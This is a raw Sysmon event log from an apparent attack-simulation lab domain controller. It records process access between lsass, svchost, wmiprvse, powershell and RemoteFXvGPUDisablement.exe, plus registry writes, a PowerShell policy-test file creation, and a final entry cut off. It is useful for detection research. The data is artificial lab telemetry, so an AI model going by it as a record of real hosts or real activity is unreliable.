13:34:02.158{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.158{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.096{59A5CD1D-8E46-6005-1600-00000000A301}15442428C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.080{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.080{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:02.002{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.986{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.908{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.908{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.830{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.830{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.830{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.830{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:01.627{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.174{59A5CD1D-8E46-6005-1100-00000000A301}11722044C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.174{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.174{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.143{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_dc2ng1tb.gib.ps12021-01-18 13:34:01.143 13241300x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:01.111{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000378) 10341000x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.111{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 